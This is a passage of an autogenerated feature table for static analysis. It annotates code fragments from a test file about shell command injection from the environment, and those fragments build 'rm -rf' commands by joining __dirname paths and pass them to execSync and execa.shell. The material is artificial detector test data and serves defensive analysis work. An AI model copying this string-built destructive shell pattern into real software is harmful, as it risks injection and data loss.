autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:38:5:41 | join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:38:5:41 | join | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:43:5:51 | __dirname | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:43:5:51 | __dirname | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:43:5:51 | __dirname | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:43:5:51 | __dirname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:43:5:51 | __dirname | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:43:5:51 | __dirname | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:43:5:51 | __dirname | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:43:5:51 | __dirname | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:43:5:51 | __dirname | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:54:5:59 | "temp" | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:54:5:59 | "temp" | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:54:5:59 | "temp" | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:54:5:59 | "temp" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:54:5:59 | "temp" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:54:5:59 | "temp" | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:54:5:59 | "temp" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:54:5:59 | "temp" | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:54:5:59 | "temp" | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:3 | cp | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:3 | cp | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:12 | cp.execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:12 | cp.execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:12 | cp.execSync | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:12 | cp.execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:12 | cp.execSync | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | cp.exec ... temp")) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | cp.exec ... temp")) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | cp.exec ... temp")) | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | cp.exec ... temp")) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | cp.exec ... temp")) | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | exceptional return of cp.exec ... temp")) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | exceptional return of cp.exec ... temp")) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | exceptional return of cp.exec ... temp")) | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | exceptional return of cp.exec ... temp")) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | exceptional return of cp.exec ... temp")) | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:5:6:12 | execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:5:6:12 | execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:5:6:12 | execSync | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:5:6:12 | execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:5:6:12 | execSync | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:22 | 'rm -rf ' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:22 | 'rm -rf ' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:22 | 'rm -rf ' | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:22 | 'rm -rf ' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:22 | 'rm -rf ' | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:22 | 'rm -rf ' | stringConcatenatedWith | -endpoint- path.join() | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:53 | 'rm -rf ... "temp") | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:53 | 'rm -rf ... "temp") | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:53 | 'rm -rf ... "temp") | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:53 | 'rm -rf ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:53 | 'rm -rf ... "temp") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:53 | 'rm -rf ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:53 | 'rm -rf ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:53 | 'rm -rf ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:14:6:53 | 'rm -rf ... "temp") | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:29 | path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:29 | path | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:29 | path | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:29 | path | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:29 | path | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:34 | path.join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:34 | path.join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:34 | path.join | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:34 | path.join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:34 | path.join | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | exceptional return of path.jo ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | exceptional return of path.jo ... "temp") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | exceptional return of path.jo ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | exceptional return of path.jo ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | exceptional return of path.jo ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | path.jo ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | path.jo ... "temp") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | path.jo ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | path.jo ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | path.jo ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | path.jo ... "temp") | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:31:6:34 | join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:31:6:34 | join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:31:6:34 | join | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:31:6:34 | join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:31:6:34 | join | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:36:6:44 | __dirname | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:36:6:44 | __dirname | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:36:6:44 | __dirname | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:36:6:44 | __dirname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:36:6:44 | __dirname | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:36:6:44 | __dirname | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:36:6:44 | __dirname | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:36:6:44 | __dirname | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:36:6:44 | __dirname | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:47:6:52 | "temp" | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:47:6:52 | "temp" | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:47:6:52 | "temp" | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:47:6:52 | "temp" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:47:6:52 | "temp" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:47:6:52 | "temp" | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:47:6:52 | "temp" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:47:6:52 | "temp" | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:47:6:52 | "temp" | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:6 | execa | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:6 | execa | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:6 | execa | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:6 | execa | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:6 | execa | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:12 | execa.shell | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:12 | execa.shell | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:12 | execa.shell | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:12 | execa.shell | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:12 | execa.shell | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | exceptional return of execa.s ... temp")) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | exceptional return of execa.s ... temp")) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | exceptional return of execa.s ... temp")) | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | exceptional return of execa.s ... temp")) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | exceptional return of execa.s ... temp")) | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | execa.s ... temp")) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | execa.s ... temp")) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | execa.s ... temp")) | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | execa.s ... temp")) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | execa.s ... temp")) | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:8:8:12 | shell | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:8:8:12 | shell | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:8:8:12 | shell | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:8:8:12 | shell | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:8:8:12 | shell | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:22 | 'rm -rf ' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:22 | 'rm -rf ' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:22 | 'rm -rf ' | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:22 | 'rm -rf ' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:22 | 'rm -rf ' | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:22 | 'rm -rf ' | stringConcatenatedWith | -endpoint- path.join() | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:53 | 'rm -rf ... "temp") | CalleeFlexibleAccessPath | execa.shell | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:53 | 'rm -rf ... "temp") | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:53 | 'rm -rf ... "temp") | calleeImports | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:53 | 'rm -rf ... "temp") | contextFunctionInterfaces | | +| 